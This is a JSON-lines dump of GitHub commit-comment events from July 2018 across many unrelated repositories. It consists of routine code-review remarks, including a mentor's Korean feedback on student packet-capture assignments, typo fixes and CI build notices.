{"id":"7982450972","type":"CommitCommentEvent","actor":{"login":"tzwjkl"},"repo":{"name":"tzwjkl/StorageRedirect-assets"},"payload":{"comment":{"id":29748509,"position":null,"line":null,"path":null,"commit_id":"bfc911203f18fb56a158f5896534daa027c5df3c","created_at":"2018-07-18T11:53:25Z","updated_at":"2018-07-18T11:53:25Z","author_association":"OWNER","body":"I lost a ']',sorry and lol..."}},"created_at":"2018-07-18T11:53:25Z"}
{"id":"7982452132","type":"CommitCommentEvent","actor":{"login":"KacperMadej"},"repo":{"name":"highcharts/rounded-corners"},"payload":{"comment":{"id":29748513,"position":null,"line":null,"path":null,"commit_id":"b1b808a9551c719b554981b95eb049fb2b4736cd","created_at":"2018-07-18T11:53:40Z","updated_at":"2018-07-18T11:53:40Z","author_association":"NONE","body":"Nope, it was not published (as you could check here: https://unpkg.com/highcharts-rounded-corners/package.json).\r\n\r\n@TorsteinHonsi Could you update or green-light the update ?"}},"created_at":"2018-07-18T11:53:40Z"}
{"id":"7982456720","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29748525,"position":null,"line":null,"path":null,"commit_id":"504e1e5e64825d46e11356b4af971a25384826f9","created_at":"2018-07-18T11:54:40Z","updated_at":"2018-07-18T11:54:40Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\n本コミットの修正範囲ではありませんが、以下の判定に対して指摘になります。\r\n\r\n// 個数と比較させる値に1を代入する \r\nint variable = 1; \r\n// 読み込んだ値が1未満であれば改行文字を出力しないように、比較させる値が1より大きければ繰り返す\r\nwhile (variable < number) {\r\n\r\n上記の判定だと、仮にユーザが1と入力すると、1回も*が表示されないことになってしまいます。今一度条件判定を見直すのと、この課題がやってほしいことはなんでしょうか？\r\n元々のList4-7のソースを見ながら、どういったロジックを追加すれば実現できるのか、落ち着いて考えてみましょう。"}},"created_at":"2018-07-18T11:54:40Z"}
{"id":"7982458298","type":"CommitCommentEvent","actor":{"login":"gabor-farkas"},"repo":{"name":"skarzhevskyy/gwt-mock-2.5.1"},"payload":{"comment":{"id":29748528,"position":null,"line":null,"path":null,"commit_id":"7e675841d3d19a627383fe2d39f5850c8793c9e2","created_at":"2018-07-18T11:55:00Z","updated_at":"2018-07-18T11:55:00Z","author_association":"NONE","body":"I didn't want to fork from GWT itself as the GWT repo itself is much broader, and I work with a really small subset of that (GWT used to be in SVN for quite a long time actually if I remember well)\r\nAlso, I basically started my mocking work by deleting a lot of stuff from GWT we didn't use (ui binding, bean binding, GSS ...).\r\nI don't really have heavy plans on this library - our codebase is decreasing fortunately (though much slower than we would love to, but that's a different question :) ), but there won't really be any new things needed for us.\r\n\r\nBut indeed, for a longer maintenance, it would make sense to fork from GWT itself. It would be quite a hack, but actually it's possible to 'migrate' the diffs from this repo to be applied on the original paths. I tried to keep my initial commits clean (keeping deletions separate from code changes), but as I wasn't sure if I would succeed at all, I didn't always focus to have a repeatable process :/"}},"created_at":"2018-07-18T11:55:00Z"}
{"id":"7982459626","type":"CommitCommentEvent","actor":{"login":"mohmed1500"},"repo":{"name":"OTAUpdateCenter/ota-updater-2.0"},"payload":{"comment":{"id":29748529,"position":null,"line":null,"path":null,"commit_id":"4c3db2f8c4cfbe76f7a6b3638d93cb7f1543cad3","created_at":"2018-07-18T11:55:17Z","updated_at":"2018-07-18T11:55:17Z","author_association":"NONE","body":"4c3db2f"}},"created_at":"2018-07-18T11:55:17Z"}
{"id":"7982460012","type":"CommitCommentEvent","actor":{"login":"xuopled"},"repo":{"name":"xuopled/react-google-places-suggest"},"payload":{"comment":{"id":29748531,"position":null,"line":null,"path":null,"commit_id":"abe184e15d19d6799a99f0b06c0726b07270394b","created_at":"2018-07-18T11:55:22Z","updated_at":"2018-07-18T11:55:22Z","author_association":"OWNER","body":"Good catch. I will change it. Thanks"}},"created_at":"2018-07-18T11:55:22Z"}
{"id":"7982469461","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29748546,"position":16,"line":38,"path":"kennsyuu1/src/kennsyuu1/E4_6_List4_7.java","commit_id":"504e1e5e64825d46e11356b4af971a25384826f9","created_at":"2018-07-18T11:57:25Z","updated_at":"2018-07-18T11:57:25Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\nこの課題が指す「改行文字」とは何か掴めているでしょうか。\r\n前に佐藤さんがコメントしていますが、もし掴めていなければ第1章を見直してみましょう。"}},"created_at":"2018-07-18T11:57:25Z"}
{"id":"7982472161","type":"CommitCommentEvent","actor":{"login":"pratapvardhan"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29748554,"position":81,"line":187,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T11:58:02Z","updated_at":"2018-07-18T11:58:02Z","author_association":"NONE","body":"```\r\nwith open(filepath) as f:\r\n    reader = csv.reader(f)\r\n    header = next(reader)\r\nreturn header\r\n```\r\nCould be one way?"}},"created_at":"2018-07-18T11:58:02Z"}
{"id":"7982481548","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ehddud758/pcap_test"},"payload":{"comment":{"id":29748579,"position":54,"line":54,"path":"main.c","commit_id":"bb60a1875cc3d7bca2f1991aa287396eaec67fea","created_at":"2018-07-18T12:00:06Z","updated_at":"2018-07-18T12:00:06Z","author_association":"NONE","body":"indent 맞춰 주세요."}},"created_at":"2018-07-18T12:00:06Z"}
{"id":"7982484477","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29748587,"position":null,"line":null,"path":null,"commit_id":"41c6dfbfd120cf6a7b39b714c3d8ab226bbaf903","created_at":"2018-07-18T12:00:39Z","updated_at":"2018-07-18T12:00:39Z","author_association":"NONE","body":"This looks fine, but perhaps it should test against `INTPTR_MAX / 2` instead of `INT_MAX / 2`.\r\n\r\nThe `int` type is commonly only 32-bit on systems that use 64-bit pointers."}},"created_at":"2018-07-18T12:00:39Z"}
{"id":"7982484929","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ehddud758/pcap_test"},"payload":{"comment":{"id":29748590,"position":61,"line":61,"path":"main.c","commit_id":"bb60a1875cc3d7bca2f1991aa287396eaec67fea","created_at":"2018-07-18T12:00:44Z","updated_at":"2018-07-18T12:00:44Z","author_association":"NONE","body":"\"네트워크 바이트 순서를 호스트 바이트 순서로 변경\"임"}},"created_at":"2018-07-18T12:00:44Z"}
{"id":"7982487971","type":"CommitCommentEvent","actor":{"login":"jjavierdguezas"},"repo":{"name":"xuopled/react-google-places-suggest"},"payload":{"comment":{"id":29748598,"position":null,"line":null,"path":null,"commit_id":"abe184e15d19d6799a99f0b06c0726b07270394b","created_at":"2018-07-18T12:01:20Z","updated_at":"2018-07-18T12:01:20Z","author_association":"CONTRIBUTOR","body":"@xuopled thank you and please update the npm package to start using the new features!"}},"created_at":"2018-07-18T12:01:20Z"}
{"id":"7982488121","type":"CommitCommentEvent","actor":{"login":"pbalcer"},"repo":{"name":"michalbiesek/memkind"},"payload":{"comment":{"id":29748600,"position":7,"line":59,"path":"include/memkind/internal/memkind_pmem.h","commit_id":"745798aafd5248e05951d789317cd1c557f09dcb","created_at":"2018-07-18T12:01:22Z","updated_at":"2018-07-18T12:01:22Z","author_association":"NONE","body":"use http://man7.org/linux/man-pages/man3/queue.3.html\r\nexample https://github.com/pmem/nvml/blob/master/src/libpmemobj/container_seglists.c"}},"created_at":"2018-07-18T12:01:22Z"}
{"id":"7982490072","type":"CommitCommentEvent","actor":{"login":"phantomlk"},"repo":{"name":"HTMLCOIN/HTMLCOIN"},"payload":{"comment":{"id":29748605,"position":null,"line":null,"path":null,"commit_id":"15c59ac886cd550a56a1b12d850a4104449ec3a3","created_at":"2018-07-18T12:01:45Z","updated_at":"2018-07-18T12:01:45Z","author_association":"NONE","body":"Typing miss.\r\nNot traslation, translation"}},"created_at":"2018-07-18T12:01:45Z"}
{"id":"7982490650","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ehddud758/pcap_test"},"payload":{"comment":{"id":29748607,"position":90,"line":90,"path":"main.c","commit_id":"bb60a1875cc3d7bca2f1991aa287396eaec67fea","created_at":"2018-07-18T12:01:52Z","updated_at":"2018-07-18T12:01:52Z","author_association":"NONE","body":"TCP Data의 크기가 16바이트 미만이라면 16바이트 돌 수 있을까요?"}},"created_at":"2018-07-18T12:01:52Z"}
{"id":"7982491915","type":"CommitCommentEvent","actor":{"login":"lllrrrlr"},"repo":{"name":"lllrrrlr/C_language"},"payload":{"comment":{"id":29748614,"position":null,"line":null,"path":null,"commit_id":"4f311961e534d12a9f6b3428f9825d54d9745220","created_at":"2018-07-18T12:02:08Z","updated_at":"2018-07-18T12:02:08Z","author_association":"OWNER","body":"Creating a strrev function yourself.\r\n\r\nIt was a very difficult problem at my level.\r\nI do not know why, but I was happy to solve this problem.\r\nI will try to be a more capable programmer."}},"created_at":"2018-07-18T12:02:08Z"}
{"id":"7982493102","type":"CommitCommentEvent","actor":{"login":"ananyamindcraft"},"repo":{"name":"ananyamindcraft/libgit3"},"payload":{"comment":{"id":29748616,"position":null,"line":null,"path":null,"commit_id":"7a9e668e5a6262490e382d1194b0c94c94fd8501","created_at":"2018-07-18T12:02:22Z","updated_at":"2018-07-18T12:02:22Z","author_association":"OWNER","body":"adding test file"}},"created_at":"2018-07-18T12:02:22Z"}
{"id":"7982494672","type":"CommitCommentEvent","actor":{"login":"purerosefallen"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29748623,"position":null,"line":null,"path":null,"commit_id":"861b5bcded25bf182b71bac16265da9ee2b89481","created_at":"2018-07-18T12:02:41Z","updated_at":"2018-07-18T12:02:41Z","author_association":"COLLABORATOR","body":"@mercury233 On preference, it uses less CPU to load 1 function than 2.\r\n@edo9300 I haven't seen a single card, either OCG/TCG or Anime/Manga with an effect like this."}},"created_at":"2018-07-18T12:02:41Z"}
{"id":"7982495192","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ehddud758/pcap_test"},"payload":{"comment":{"id":29748625,"position":92,"line":92,"path":"main.c","commit_id":"bb60a1875cc3d7bca2f1991aa287396eaec67fea","created_at":"2018-07-18T12:02:49Z","updated_at":"2018-07-18T12:02:49Z","author_association":"NONE","body":"\"tcph++->th_off\"?\r\n제대로 TCP Data가 출력되는지 확인해 보세요."}},"created_at":"2018-07-18T12:02:49Z"}
{"id":"7982496253","type":"CommitCommentEvent","actor":{"login":"catborise"},"repo":{"name":"retspen/webvirtcloud"},"payload":{"comment":{"id":29748630,"position":null,"line":null,"path":null,"commit_id":"d44c65a3f488d97165e52524eaefed06cf3c594a","created_at":"2018-07-18T12:03:04Z","updated_at":"2018-07-18T12:03:04Z","author_association":"CONTRIBUTOR","body":"pep8 style code reformat nothing change"}},"created_at":"2018-07-18T12:03:04Z"}
{"id":"7982497737","type":"CommitCommentEvent","actor":{"login":"luca3s"},"repo":{"name":"luca3s/discord_test_bot"},"payload":{"comment":{"id":29748637,"position":null,"line":null,"path":null,"commit_id":"e91cc55d01bb5c22feba3a470513b32b076c8a79","created_at":"2018-07-18T12:03:22Z","updated_at":"2018-07-18T12:03:22Z","author_association":"OWNER","body":"Übersichtlichkeitsverbesserungen"}},"created_at":"2018-07-18T12:03:22Z"}
{"id":"7982497860","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29748638,"position":5,"line":194,"path":"lib/connection.js","commit_id":"1e74d3f4d54be73785770177907d791ad249d4ba","created_at":"2018-07-18T12:03:24Z","updated_at":"2018-07-18T12:03:24Z","author_association":"COLLABORATOR","body":"Please update the type definitions as well. `reset()` should be removed from connection interface over [here](https://github.com/amqp/rhea/blob/master/typings/connection.d.ts#L541) and session interface over [here](https://github.com/amqp/rhea/blob/master/typings/session.d.ts#L38)."}},"created_at":"2018-07-18T12:03:24Z"}
{"id":"7982500026","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"34t3rnull/pcap_assignment"},"payload":{"comment":{"id":29748642,"position":null,"line":null,"path":null,"commit_id":"d92a510e235eecf6ee1de3c65690efc1cee6b1c8","created_at":"2018-07-18T12:03:53Z","updated_at":"2018-07-18T12:03:53Z","author_association":"NONE","body":"main.o 파일 git에서 삭제해 주세요."}},"created_at":"2018-07-18T12:03:53Z"}
{"id":"7982500841","type":"CommitCommentEvent","actor":{"login":"luca3s"},"repo":{"name":"luca3s/discord_test_bot"},"payload":{"comment":{"id":29748644,"position":null,"line":null,"path":null,"commit_id":"599c056b186ef458884aa0e203cc73a20ae45fb3","created_at":"2018-07-18T12:04:03Z","updated_at":"2018-07-18T12:04:03Z","author_association":"OWNER","body":"Übersichtlichkeitsverbesserungen"}},"created_at":"2018-07-18T12:04:03Z"}
{"id":"7982502566","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29748645,"position":null,"line":null,"path":null,"commit_id":"861b5bcded25bf182b71bac16265da9ee2b89481","created_at":"2018-07-18T12:04:23Z","updated_at":"2018-07-18T12:04:23Z","author_association":"COLLABORATOR","body":"I think we shouldn't make the code hard to read for just a bit performance.\r\n"}},"created_at":"2018-07-18T12:04:23Z"}
{"id":"7982503015","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29748647,"position":25,"line":25,"path":"MyFlaskApp/app.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:04:29Z","updated_at":"2018-07-18T12:04:29Z","author_association":"OWNER","body":"changed to REST"}},"created_at":"2018-07-18T12:04:29Z"}
{"id":"7982504098","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29748652,"position":8,"line":8,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:04:42Z","updated_at":"2018-07-18T12:04:42Z","author_association":"OWNER","body":"removed"}},"created_at":"2018-07-18T12:04:42Z"}
{"id":"7982506538","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29748658,"position":27,"line":27,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:05:13Z","updated_at":"2018-07-18T12:05:13Z","author_association":"OWNER","body":"Done now I use request.get_json"}},"created_at":"2018-07-18T12:05:13Z"}
{"id":"7982509055","type":"CommitCommentEvent","actor":{"login":"NadavOs90"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29748662,"position":57,"line":57,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-18T12:05:44Z","updated_at":"2018-07-18T12:05:44Z","author_association":"OWNER","body":"Got it iI will change my query"}},"created_at":"2018-07-18T12:05:44Z"}
{"id":"7982510840","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"34t3rnull/pcap_assignment"},"payload":{"comment":{"id":29748665,"position":49,"line":49,"path":"main.cpp","commit_id":"328029c3c9220fafb93104276342a1b13db8b8f7","created_at":"2018-07-18T12:06:06Z","updated_at":"2018-07-18T12:06:06Z","author_association":"NONE","body":"TCP Header의 시작 위치는 IP Header의 시작 위치에서 20바이트(기본 IP Header 크기)만큼 Skip된다는 보장이 안됩니다. 정확한 IP Header의 크기를 계산하는 방법을 알아 보시기 바랍니다."}},"created_at":"2018-07-18T12:06:06Z"}
{"id":"7982511091","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29748666,"position":11,"line":58,"path":"lib/endpoint.js","commit_id":"1e74d3f4d54be73785770177907d791ad249d4ba","created_at":"2018-07-18T12:06:09Z","updated_at":"2018-07-18T12:06:09Z","author_association":"COLLABORATOR","body":"I know that EndpointState is not exported to the customer. However, having type definitions in sync would always help in the long run. reconnect() method should be added to Endpoint interface over [here](https://github.com/amqp/rhea/blob/master/typings/endpoint.d.ts)."}},"created_at":"2018-07-18T12:06:09Z"}
{"id":"7982513322","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"34t3rnull/pcap_assignment"},"payload":{"comment":{"id":29748670,"position":50,"line":50,"path":"main.cpp","commit_id":"328029c3c9220fafb93104276342a1b13db8b8f7","created_at":"2018-07-18T12:06:36Z","updated_at":"2018-07-18T12:06:36Z","author_association":"NONE","body":"TCP Data의 시작 위치도 동일. TCP Header의 크기는 무조건 20바이트라고 단정할 수 없음."}},"created_at":"2018-07-18T12:06:36Z"}
{"id":"7982514243","type":"CommitCommentEvent","actor":{"login":"1B0Y"},"repo":{"name":"ciber96/mtabg"},"payload":{"comment":{"id":29748671,"position":null,"line":null,"path":null,"commit_id":"0730411906002e17747249f2702b85ca338a2a22","created_at":"2018-07-18T12:06:47Z","updated_at":"2018-07-18T12:06:47Z","author_association":"NONE","body":"@expert975 Line 28 - Please change \"Filed\" to \"Failed\" as it's legit just triggered my OCD lmao"}},"created_at":"2018-07-18T12:06:47Z"}
{"id":"7982514345","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29748672,"position":4,"line":222,"path":"lib/link.js","commit_id":"1e74d3f4d54be73785770177907d791ad249d4ba","created_at":"2018-07-18T12:06:48Z","updated_at":"2018-07-18T12:06:48Z","author_association":"COLLABORATOR","body":"link's reset method should also be removed from the type definition."}},"created_at":"2018-07-18T12:06:48Z"}
{"id":"7982516286","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"34t3rnull/pcap_assignment"},"payload":{"comment":{"id":29748677,"position":51,"line":51,"path":"main.cpp","commit_id":"328029c3c9220fafb93104276342a1b13db8b8f7","created_at":"2018-07-18T12:07:13Z","updated_at":"2018-07-18T12:07:13Z","author_association":"NONE","body":"src mac, dst mac 출력하는 코드가 중복되는 거 같은데 코드의 중복을 줄일 수 있도록 별도의 함수를 작성해 보세요."}},"created_at":"2018-07-18T12:07:13Z"}
{"id":"7982517039","type":"CommitCommentEvent","actor":{"login":"1B0Y"},"repo":{"name":"ciber96/mtabg"},"payload":{"comment":{"id":29748681,"position":7,"line":28,"path":"battlegrounds/lang/sUpdateSpreadsheet.lua","commit_id":"0730411906002e17747249f2702b85ca338a2a22","created_at":"2018-07-18T12:07:22Z","updated_at":"2018-07-18T12:07:22Z","author_association":"NONE","body":"\"Filed\" -> \"Failed\". Please fix, gonna loose my shiz."}},"created_at":"2018-07-18T12:07:22Z"}
{"id":"7982517691","type":"CommitCommentEvent","actor":{"login":"xausky"},"repo":{"name":"xausky/UnityModManager"},"payload":{"comment":{"id":29748682,"position":null,"line":null,"path":null,"commit_id":"ee9e5f434b4360e19f339973992fc97cd4a873bb","created_at":"2018-07-18T12:07:30Z","updated_at":"2018-07-18T12:07:30Z","author_association":"OWNER","body":"这个作者虽然也说要暂停更新，不过已经更新的内容也比原来那个好，而且修复了安卓8关于辅助输入的问题，所以换这个了。"}},"created_at":"2018-07-18T12:07:30Z"}
{"id":"7982520296","type":"CommitCommentEvent","actor":{"login":"solael"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":29748688,"position":null,"line":null,"path":null,"commit_id":"17265b63c83699dd8653a706fb427f9bf3cb1013","created_at":"2018-07-18T12:07:59Z","updated_at":"2018-07-18T12:07:59Z","author_association":"NONE","body":"Just find the bug in our application, hope a new NPM release soon."}},"created_at":"2018-07-18T12:07:59Z"}
{"id":"7982521081","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29748690,"position":null,"line":null,"path":null,"commit_id":"3b3af9829e43533bc369525afa566a7cec5b7c72","created_at":"2018-07-18T12:08:09Z","updated_at":"2018-07-18T12:08:09Z","author_association":"COLLABORATOR","body":"Puzzle `66-612c9792` disappeared from [`node/app.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py), that's why I closed #80. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-18T12:08:09Z"}
{"id":"7982521164","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29748691,"position":null,"line":null,"path":null,"commit_id":"f0b1ce4cb4bf7d1ce0ef932cf52c8fab5166e906","created_at":"2018-07-18T12:08:10Z","updated_at":"2018-07-18T12:08:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-18T12:08:10Z"}
{"id":"7982523034","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"34t3rnull/pcap_assignment"},"payload":{"comment":{"id":29748697,"position":63,"line":63,"path":"main.cpp","commit_id":"328029c3c9220fafb93104276342a1b13db8b8f7","created_at":"2018-07-18T12:08:30Z","updated_at":"2018-07-18T12:08:30Z","author_association":"NONE","body":"TCP Data의 크기가 8바이트 미만이라면? data[7]로 access하면 안되겠죠? 정확한 TCP Data의 크기를 알아내는 방법을 알아 보세요.\r\n\r\n그리고 8바이트 말고 16바이트까지 출력할 것."}},"created_at":"2018-07-18T12:08:30Z"}
{"id":"7982525832","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29748704,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-18T12:09:06Z","updated_at":"2018-07-18T12:09:06Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 84](http://ci.n5o.green/viewLog.html?buildId=1602&buildTypeId=Plugins_Csv) is now running\n"}},"created_at":"2018-07-18T12:09:06Z"}
{"id":"7982529146","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29748714,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-18T12:09:47Z","updated_at":"2018-07-18T12:09:47Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 84](http://ci.n5o.green/viewLog.html?buildId=1602&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:41"}},"created_at":"2018-07-18T12:09:47Z"}
{"id":"7982531785","type":"CommitCommentEvent","actor":{"login":"neverovda"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29748723,"position":32,"line":32,"path":"lesson_1/rightTriangle.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T12:10:20Z","updated_at":"2018-07-18T12:10:20Z","author_association":"OWNER","body":"Вторая строчка прям крутая. А как это называется ? Это относится к деструктуризации (из js словечко взял) ?"}},"created_at":"2018-07-18T12:10:20Z"}
{"id":"7982533713","type":"CommitCommentEvent","actor":{"login":"tyron"},"repo":{"name":"awsdocs/iam-user-guide"},"payload":{"comment":{"id":29748736,"position":null,"line":null,"path":null,"commit_id":"64aa95d08c0ce98ca64c99e210ecddcd6bb9b0d4","created_at":"2018-07-18T12:10:44Z","updated_at":"2018-07-18T12:10:44Z","author_association":"CONTRIBUTOR","body":"@carlasp can you please review if this commit undid the changes from #41? "}},"created_at":"2018-07-18T12:10:44Z"}
{"id":"7982535154","type":"CommitCommentEvent","actor":{"login":"mfkl"},"repo":{"name":"mfkl/LibVLC.PInvoke.Mac"},"payload":{"comment":{"id":29748741,"position":null,"line":null,"path":null,"commit_id":"0cd7baac8420af569b05949d9bc601b1a8abf6ba","created_at":"2018-07-18T12:11:02Z","updated_at":"2018-07-18T12:11:02Z","author_association":"OWNER","body":"I do get a single warning on build... `MMP : warning MM2006: Native library 'libvlc.5' was referenced but could not be found.`"}},"created_at":"2018-07-18T12:11:02Z"}
{"id":"7982537345","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29748744,"position":21,"line":36,"path":"src/reducers/posts.js","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T12:11:29Z","updated_at":"2018-07-18T12:11:29Z","author_association":"OWNER","body":"Пофіксив\r\n"}},"created_at":"2018-07-18T12:11:29Z"}
{"id":"7982537474","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Py0zz1/pcap_test"},"payload":{"comment":{"id":29748745,"position":135,"line":135,"path":"main.cpp","commit_id":"1f19a513866a743bb9e877507a8ccee9996a3809","created_at":"2018-07-18T12:11:31Z","updated_at":"2018-07-18T12:11:31Z","author_association":"NONE","body":"* 5?\r\n* 4가 아니고? "}},"created_at":"2018-07-18T12:11:31Z"}
{"id":"7982544220","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Py0zz1/pcap_test"},"payload":{"comment":{"id":29748753,"position":73,"line":73,"path":"main.cpp","commit_id":"1f19a513866a743bb9e877507a8ccee9996a3809","created_at":"2018-07-18T12:12:56Z","updated_at":"2018-07-18T12:12:56Z","author_association":"NONE","body":"TCP Data의 크기를 계산할 때 caplen으로 계산하는 것이 아니고 IP Header의 Total Length를 가지고 계산해야 합니다."}},"created_at":"2018-07-18T12:12:56Z"}
{"id":"7982545588","type":"CommitCommentEvent","actor":{"login":"pratapvardhan"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29748757,"position":67,"line":173,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T12:13:13Z","updated_at":"2018-07-18T12:13:13Z","author_association":"NONE","body":"This could be `return list(set(x for x in header_row if header_row.count(x) > 1))`?"}},"created_at":"2018-07-18T12:13:13Z"}
{"id":"7982546895","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Py0zz1/pcap_test"},"payload":{"comment":{"id":29748760,"position":141,"line":141,"path":"main.cpp","commit_id":"1f19a513866a743bb9e877507a8ccee9996a3809","created_at":"2018-07-18T12:13:29Z","updated_at":"2018-07-18T12:13:29Z","author_association":"NONE","body":"14바이트가 아니고 16바이트까지 출력할 것. 그리고 TCP Data의 크기를 고려할 것."}},"created_at":"2018-07-18T12:13:29Z"}
{"id":"7982548357","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29748762,"position":60,"line":62,"path":"test/tests.js","commit_id":"1baa84ad9a7c19b0827d266122ce806306cb53cb","created_at":"2018-07-18T12:13:47Z","updated_at":"2018-07-18T12:13:47Z","author_association":"OWNER","body":"I'm having problems here. `splitter` is not being populated by the `beforeEach` step. I'm stuck :-("}},"created_at":"2018-07-18T12:13:47Z"}
{"id":"7982552172","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"cpstdhs/pcap_test"},"payload":{"comment":{"id":29748768,"position":37,"line":37,"path":"ass.cpp","commit_id":"8722acf2947b8a0ea29d65fae5d0d1cd7bdee1d2","created_at":"2018-07-18T12:14:35Z","updated_at":"2018-07-18T12:14:35Z","author_association":"NONE","body":"잡힌 패킷에 IP Header가 없다면?"}},"created_at":"2018-07-18T12:14:35Z"}
{"id":"7982557728","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"cpstdhs/pcap_test"},"payload":{"comment":{"id":29748789,"position":41,"line":41,"path":"ass.cpp","commit_id":"8722acf2947b8a0ea29d65fae5d0d1cd7bdee1d2","created_at":"2018-07-18T12:15:43Z","updated_at":"2018-07-18T12:15:43Z","author_association":"NONE","body":"잡힌 패킷에 TCP Header가 없다면?\r\n"}},"created_at":"2018-07-18T12:15:43Z"}
{"id":"7982558242","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29748790,"position":4,"line":46,"path":"lib/errors.js","commit_id":"df00b8c187d704a339044c793ff5cd24a2e259fc","created_at":"2018-07-18T12:15:50Z","updated_at":"2018-07-18T12:15:50Z","author_association":"COLLABORATOR","body":"ConnectionError is an exported type in index.d.ts. toJSON() should be added to the interface definition over [here](https://github.com/amqp/rhea/blob/master/typings/errors.d.ts#L12).\r\n\r\n```javascript\r\nexport interface ErrorJsonRepresentation {\r\n  type: string;\r\n  code: string;\r\n  message: string\r\n}\r\n\r\nexport declare interface ConnectionError extends Error {\r\n    message: string;\r\n    name: string;\r\n    description: string;\r\n    condition: any;\r\n    connection: any;\r\n    toJSON(): ErrorJsonRepresentation;\r\n}\r\n```"}},"created_at":"2018-07-18T12:15:50Z"}
